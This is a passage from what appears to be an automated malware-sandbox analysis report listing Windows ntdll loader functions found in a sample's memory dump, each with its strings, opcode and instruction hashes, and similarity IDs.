                                        • Opcode Fuzzy Hash: e0a05ae8c876ff84f749cb38626852d9038948746832dd00306d1d24e4ec3133
                                        • Instruction Fuzzy Hash: 045106B9100354CBFB64CA29C4847B277E5EF45388F50888EE4D58BA85EA36D847DB70
                                        Function 329415EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                        Download Yara Rule
                                        Strings
                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32981943
                                        • LdrpAllocateTls, xrefs: 3298194A
                                        • minkernel\ntdll\ldrtls.c, xrefs: 32981954
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                        • API String ID: 0-4274184382
                                        • Opcode ID: 6dadfb6e37b3939fa617c8359e3dd6a9769842774dcc39795a927dea7fa96815
                                        • Instruction ID: b4f8a9e92b0d22bd3849ad6f753d3b87cef59d12a4708a765033af7441922905
                                        • Opcode Fuzzy Hash: 6dadfb6e37b3939fa617c8359e3dd6a9769842774dcc39795a927dea7fa96815
                                        • Instruction Fuzzy Hash: A64178B5A00709EFDB18CFA9D881BAEBBB5FF48704F048529E405A7351DB75A841CF90
                                        Function 329432C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlCreateActivationContext, xrefs: 32982803
                                        • SXS: %s() passed the empty activation context data, xrefs: 32982808
                                        • Actx , xrefs: 329432CC
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                        • API String ID: 0-859632880
                                        • Opcode ID: 4db18d3062e0227514fe0e40018711bd76b57472abff9a4ae835ab49bab381b1
                                        • Instruction ID: dfbb8585cd32bb348e471bb1e8e0bb5bc4ea88071ee7cf1b2d551a0f94fef811
                                        • Opcode Fuzzy Hash: 4db18d3062e0227514fe0e40018711bd76b57472abff9a4ae835ab49bab381b1
                                        • Instruction Fuzzy Hash: DA310376A003459FEB05CE28D890F9A37A8EB48718FA54469FD049F286CFB1D845CBD0
                                        Function 3299B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                        Download Yara Rule
                                        Strings
                                        • GlobalFlag, xrefs: 3299B30F
                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3299B2B2
                                        • @, xrefs: 3299B2F0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                        • API String ID: 0-4192008846
                                        • Opcode ID: 9937416bb9bf476cda66044c72d737762a02d08379c137886044ff5ba2694fb4
                                        • Instruction ID: 3ec21b23b7ea9bb0de34573cb1d0b11fef47bc5b8374dddc47999631c879ef19
                                        • Opcode Fuzzy Hash: 9937416bb9bf476cda66044c72d737762a02d08379c137886044ff5ba2694fb4
                                        • Instruction Fuzzy Hash: 36316DB5E0120DAEEB00DFA4DC91AEEBBBCEF04354F500469E605AB241DB749A448B90
                                        Function 32951190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                        Download Yara Rule
                                        Strings
                                        • BuildLabEx, xrefs: 3295122F
                                        • @, xrefs: 329511C5
                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3295119B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 0-3051831665
                                        • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                        • Instruction ID: 9b331480be868c2e315c6052687e43b99585c56a326a186fd4fbfc3385a8426e
                                        • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                        • Instruction Fuzzy Hash: 27316176A00619BBEB11CBA5DC44EEEBB7DEF84754F204025F514A72A1DB70DA05CB90
                                        Function 329985AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        Strings
                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 329985DE
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                        • API String ID: 0-702105204
                                        • Opcode ID: 1bf5fce3931d90730c270fbaa1542376aad60b3e1950eb50f9bf4c71f9dd9d9f
                                        • Instruction ID: 74064e3421d5126493f5c5072c7d3bf5ce6b322aa7f2c754a5be2d7a0a194558
                                        • Opcode Fuzzy Hash: 1bf5fce3931d90730c270fbaa1542376aad60b3e1950eb50f9bf4c71f9dd9d9f
                                        • Instruction Fuzzy Hash: 9501FE766043056BE7255E55F848ADA7B6DFF4C3B8F4004DCE9015B553CF60A8C6CE94
                                        Function 329251C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@
                                        • API String ID: 0-149943524
                                        • Opcode ID: 361a649b562a7f2d792e866357f054f014d4cbaa5df1c2f6f5dfd2b0b6ee9099
                                        • Instruction ID: f5c4e3805ba23bd0d81f273dc8a97fbee056abeed6b80b1a7b11b1a1e9b34ef2
                                        • Opcode Fuzzy Hash: 361a649b562a7f2d792e866357f054f014d4cbaa5df1c2f6f5dfd2b0b6ee9099
                                        • Instruction Fuzzy Hash: 9732B0B45083558FD728CF18C480B3EB7E9EF89748F50492EF9859B294EB74D984CB92
                                        Function 32915622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: fad224385689cf1d728c0c841dc90f34feda4a9d87417c4564bade601fcbe878
                                        • Instruction ID: 4c56d3d41064c6a48b40cfb26e325f13596b1683fec7888a0947d0a236a63ac5
                                        • Opcode Fuzzy Hash: fad224385689cf1d728c0c841dc90f34feda4a9d87417c4564bade601fcbe878
                                        • Instruction Fuzzy Hash: 4D31D231301B1AEFE7569B26C950B8AFB69BF44794F415125E90047B51DBB0FC21CBD0
                                        Function 3298E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Legacy$UEFI
                                        • API String ID: 0-634100481
                                        • Opcode ID: b819824a3cca290480a2cda97216fb40f4a6008f39de28d853fb4e19359c4d70
                                        • Instruction ID: c3dfebf2149875f8a105590b139d46c3cb292933e4f89c4aa7100c41b3d12b17
                                        • Opcode Fuzzy Hash: b819824a3cca290480a2cda97216fb40f4a6008f39de28d853fb4e19359c4d70
                                        • Instruction Fuzzy Hash: 73615DB1A043099FEB14CFA8C850BADB7F9FB48744F54406AF589EB251EB71D900CB91
                                        Function 3292F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$$
                                        • API String ID: 3446177414-233714265
                                        • Opcode ID: 5d8651941d01de4366af5004150b27ab1e48a7c500dd1844f2ed8ee63b9c9ab6
                                        • Instruction ID: d68a09341bf0a8eb44c6e28641d9f2e86ebe1d82dcc9a9967113fb9f676f59f3
                                        • Opcode Fuzzy Hash: 5d8651941d01de4366af5004150b27ab1e48a7c500dd1844f2ed8ee63b9c9ab6
                                        • Instruction Fuzzy Hash: 6C61CCB5A0174DCFEB20CFA8C580B9DB7F5FF44708F108469D605AB699CBB4A941CB90
                                        Function 3291A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 3291A229
                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 3291A21B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                        • API String ID: 0-2876891731
                                        • Opcode ID: b017b177ede27b8b91b64c777dcf765d4fd6d4df8dff0297c95c3904ada67aa8
                                        • Instruction ID: 2365d70eef0a49783624daeaa8493c2aa6fdcad0dda4a3d677962be019ee36a6
                                        • Opcode Fuzzy Hash: b017b177ede27b8b91b64c777dcf765d4fd6d4df8dff0297c95c3904ada67aa8
                                        • Instruction Fuzzy Hash: 9141FDB5A00748CFEB19CF5AC540B59B7B8EF85754F2444A5EC10DF2A5EA7AED40CB00
                                        Function 329A314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                        • API String ID: 0-118005554
                                        • Opcode ID: ad2743a3c66ee825cdf96b10f1d20660a7dd3bf32660f99e0be7c0b5f55a583e
                                        • Instruction ID: 27bf1f63f173f52659444cfce1bfa0cfa70e871bb84537171fd8f0a7a33b43c7
                                        • Opcode Fuzzy Hash: ad2743a3c66ee825cdf96b10f1d20660a7dd3bf32660f99e0be7c0b5f55a583e
                                        • Instruction Fuzzy Hash: 1C3101752087808FD311CF69D860B1AB7E8EF89758F044869FD54CB381EB70D905CB5A
                                        Function 329431BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local\$@
                                        • API String ID: 0-380025441
                                        • Opcode ID: 818c2534b163b399889d2f7394738279e48ae2f37a1263514aae226adae7a18c
                                        • Instruction ID: 6eeb0d6fbc8ad78cdb4669eb05299e109780dbc1ee4dea51c6936e47279f6a78
                                        • Opcode Fuzzy Hash: 818c2534b163b399889d2f7394738279e48ae2f37a1263514aae226adae7a18c
                                        • Instruction Fuzzy Hash: A93190B5549345AFD320DF28C880A5BBBE8FB89754F900A2EFD9483250DB30DD09CB96
                                        Function 329433D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3298289F
                                        • RtlpInitializeAssemblyStorageMap, xrefs: 3298289A
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                        • API String ID: 0-2653619699
                                        • Opcode ID: f01724a9f70c368af67e6edb0471a2fadfa9a7634395fa842953e8a63cc450fe
                                        • Instruction ID: cfde08f1aa77a22b9e8ec407390a315537703777a4e7dc8a3c9efb519df38088
                                        • Opcode Fuzzy Hash: f01724a9f70c368af67e6edb0471a2fadfa9a7634395fa842953e8a63cc450fe
                                        • Instruction Fuzzy Hash: 50112576F04304FBFB19CA58DD40F9B77ACDB88758FA48029BA04EB284DE74CD0086A4
                                        Function 3291C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: MUI
                                        • API String ID: 0-1339004836
                                        • Opcode ID: b5073960ef5767193de2aabc82578bd8ee34989d5fc44104e7511885385708ae
                                        • Instruction ID: 267dd11192e2b2136ebcb19b07b81fa76848bfa6e19b5408f2a91f983146d758
                                        • Opcode Fuzzy Hash: b5073960ef5767193de2aabc82578bd8ee34989d5fc44104e7511885385708ae
                                        • Instruction Fuzzy Hash: FC826CB9E0031C9FEB24CFAAC9817ADB7B5FF49354F108169D819AB290DB70AD41CB51
                                        Function 329164F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03f1d51ef1dd930780a78a11f5de8683a787cbf732732d8642b2f7efa1ad3c19
                                        • Instruction ID: 5e4659cf1654a2e8e51c98b2b27e07f785bfcb2869b9187a2cefc6adb4a7f6f7
                                        • Opcode Fuzzy Hash: 03f1d51ef1dd930780a78a11f5de8683a787cbf732732d8642b2f7efa1ad3c19
                                        • Instruction Fuzzy Hash: 9BE1AD74A08345CFD304CF29C090A5ABBE5FF88358F158A6DE9898B351DB71E906CF92
                                        Function 32911051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: e85b113305de8158ed209362a6fbc4bfac5da6f1b09faf80e2737e3d9037aa9a
                                        • Instruction ID: 6ca8574e65b5fc8d84e1685664449788fc556efb203f5ac211f90f95d2da453c
                                        • Opcode Fuzzy Hash: e85b113305de8158ed209362a6fbc4bfac5da6f1b09faf80e2737e3d9037aa9a
                                        • Instruction Fuzzy Hash: 59B112B56093809FD354CF28C480A6AFBF1BF88758F14896EE89987352D771E845CB82
                                        Function 32917623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 112bda760a79bfa277bcbb8bcbb324c41e5ed58bd74101007bf4e70f672ecb0f
                                        • Instruction ID: 4f5b33ace93d510beaa8223e539efd47d287d256ae5fd7af052219ec0b175850
                                        • Opcode Fuzzy Hash: 112bda760a79bfa277bcbb8bcbb324c41e5ed58bd74101007bf4e70f672ecb0f
                                        • Instruction Fuzzy Hash: EA616175A0060AEFDB08CF79C880B9DFBB5BF88744F24856AD419A7305DB70B951CB90
                                        Function 32914779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 7f3acbdead198591796cd73f45010894dfe246fc6e1bade1bcde96e168f7b5c5
                                        • Instruction ID: 4933045531d8a7b4fd157b86bf676f96b586fccba0518b025da8eb5ab16f4d4c
                                        • Opcode Fuzzy Hash: 7f3acbdead198591796cd73f45010894dfe246fc6e1bade1bcde96e168f7b5c5
                                        • Instruction Fuzzy Hash: E8411374600389CFD314CF2AC894B2AB7E9FF89764F10587DE9418B2A1DB70E852CB91
                                        Function 3290B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: de204db0878cfbbfadf3bd61ea15f98759bb75e7933168e198e7b01b6da6ac51
                                        • Instruction ID: c485b58682e7b5e24a51c645fbfb97339637749971b4f1afd0eefbb8231e545d
                                        • Opcode Fuzzy Hash: de204db0878cfbbfadf3bd61ea15f98759bb75e7933168e198e7b01b6da6ac51
                                        • Instruction Fuzzy Hash: 4B31007264030C9FC311DF14C8A0A5A77A9EF45768F10826AED089F2A2CB71EE42CFD0
                                        Function 329156E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 65c957ed59b3c9cb7cca9124ab72d7adcff692ea9261b8e2127ed5b83337e8d5
                                        • Instruction ID: e6fa3a69b3b7bd8dce5e842872aa35eee2fe39b42dc60c2810beaa7afb102cfa
                                        • Opcode Fuzzy Hash: 65c957ed59b3c9cb7cca9124ab72d7adcff692ea9261b8e2127ed5b83337e8d5
                                        • Instruction Fuzzy Hash: C931AD39615A09FFE7568B25CA90B89BBA5FF88750F416155EC0187B51CB71F831CB80
                                        Function 329BE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 1f03048945adb1f35f4e68bc11d1ac333b497138c8b43fda74b62ddbf57d8e80
                                        • Instruction ID: 049dc60aab6b7cb74f503e7c98fd6a7a48ba8b893b428155d383e90dce0eac6a
                                        • Opcode Fuzzy Hash: 1f03048945adb1f35f4e68bc11d1ac333b497138c8b43fda74b62ddbf57d8e80
                                        • Instruction Fuzzy Hash: 983167B59057068FCB04DF19C54094ABBF9FF89758F8489AEE8889B201D630ED05CFD2
                                        Function 329092AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: d289826de171c2b63b3ce4b2d22425eddd71b32ff711467845262f283f1541cd
                                        • Instruction ID: 3f1d9fd75ac82a67d46fd90f6bf6567d068e631229ab1bad96140138a24dc027
                                        • Opcode Fuzzy Hash: d289826de171c2b63b3ce4b2d22425eddd71b32ff711467845262f283f1541cd
                                        • Instruction Fuzzy Hash: 9EF0FA32200708AFE3319B18CC04F9ABBEDEF88B00F04052CA94293091CAA0E90ACA60
                                        Function 3291965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                        • Instruction ID: 5ba236a50b4c00cab9df40e3130b63bf56e563a1375a3460953b5e8a724d6405
                                        • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                        • Instruction Fuzzy Hash: 6C617C75D0031DAFEB11CFA9C940BDEBBB8EF44754F20455AE811AB250DB74AA01CBA0
                                        Function 329202F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
